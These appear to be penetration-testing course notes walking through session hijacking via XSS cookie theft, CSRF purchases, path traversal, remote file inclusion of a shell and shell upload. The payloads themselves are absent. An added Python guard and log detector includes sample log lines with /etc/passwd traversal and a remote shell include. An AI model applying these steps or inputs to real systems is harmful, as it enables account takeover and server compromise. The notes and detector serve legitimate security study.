
Session Hijacking & Fixation

– e.g. a comment page vulnerable to XSS, so we can insert a payload there:


– open Firebug → Cookies tab → check whether the HttpOnly flag is set [we have to be logged into our
own account]. If it is not set, JavaScript can read the cookie, so an injected script can steal it;
– With a PHP script to collect cookies set up on the attacker's site, this is the payload we can insert into
the XSS-vulnerable comment page:

Now impersonate the victim:

Firebug → replace our cookie with the stolen one;

Sniffing network traffic [local network] to steal the cookie:

→ filter for HTTP traffic only;


→ analyse the GET requests for the login:

now to read the cookie:


Third method:

→ requires a shell and read privileges on the target web server:


→ e.g. for a Linux server:

Cross Site Request Forgery

– buy things we are not supposed to;

intercept with Burp and send the checkout request to Decoder, since there is some encoding:

decode as “URL” by selecting URL from the drop-down menu on the right;

→ now forward the request to see what happens – note there does not appear to be any anti-CSRF token in
the request that would prevent cross-site request forgery;

→ now force the victim to purchase something by clicking on a crafted link, e.g.:


better is to force the victim to visit a site we own and silently issue the purchase request from there:

Files & Resources Vulns

Upload a test file and note the file= parameter, which is the first injection point:

if the file= parameter is not sanitised, an attacker could gain access to arbitrary files:

try to access the root folder on this Linux system:

use ../ to go up the file system tree. Try one at a time; we do not know how many levels we have to go
up.

Also, test for errors by using a filename that will not exist. Errors can be very useful:
→ in this warning, the full path we are after is at the end of the warning;

but if there is no error, we have to guess how many ../ steps we need to add to reach root:
once we are in the root directory, any further ../ are ignored, so use enough to guarantee that we
reach the root directory:

pointing file= at google.com and seeing the Google page load shows this parameter is vulnerable to remote
file inclusion:
now edit the payload so the target server includes a shell, e.g. shell.txt; the shell.txt file should be
hosted on the remote server:
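
Added example, not from the original notes: a Python guard for the file= parameter that refuses the three cases above (a URL for remote inclusion, an absolute path, and ../ steps that leave the base directory, however many are supplied), plus a detection pass over constructed access-log lines. BASE_DIR, the log format and the sample lines are assumptions.

```python
import os
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Assumed directory the handler serves from (placeholder; the page's real path is unknown).
BASE_DIR = os.path.realpath("/var/www/app/pages")

def classify_file_param(value: str) -> str:
    """Verdict for an already URL-decoded file= value: 'remote' (a URL, i.e. remote
    file inclusion), 'absolute', 'traversal' (../ escapes BASE_DIR) or 'ok'."""
    if urlsplit(value).scheme or value.startswith("//"):
        return "remote"
    if os.path.isabs(value):
        return "absolute"
    # Surplus ../ steps stop at / and are then ignored, so resolve and check the prefix.
    resolved = os.path.realpath(os.path.join(BASE_DIR, value))
    if os.path.commonpath([BASE_DIR, resolved]) != BASE_DIR:
        return "traversal"
    return "ok"

def safe_include_path(value: str) -> Optional[str]:
    """Hardened handler: the resolved path for a benign value, None otherwise."""
    if classify_file_param(value) != "ok":
        return None
    return os.path.realpath(os.path.join(BASE_DIR, value))

REQUEST = re.compile(r'"GET (?P<path>\S+) HTTP/1\.[01]" (?P<status>\d{3})')

def flag_log(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Detection side: (verdict, value, status) for each suspicious file= value."""
    findings = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        # parse_qs percent-decodes once, the same as the web server would.
        for value in parse_qs(urlsplit(m.group("path")).query).get("file", []):
            verdict = classify_file_param(value)
            if verdict != "ok":
                findings.append((verdict, value, m.group("status")))
    return findings

# Constructed sample access-log lines (not taken from the page).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /view.php?file=test.txt HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /view.php?file=../../../../../../etc/passwd HTTP/1.1" 200 1843',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /view.php?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1843',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /view.php?file=http://example.com/shell.txt HTTP/1.1" 200 77',
]
```

The prefix check uses commonpath rather than a string startswith, so a sibling directory such as pages-old/ is also refused.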

unrestricted file upload:

– can lead to shells being uploaded;


– check the source code for the URL path where uploads are normally stored;
– example of the shell working in this case:
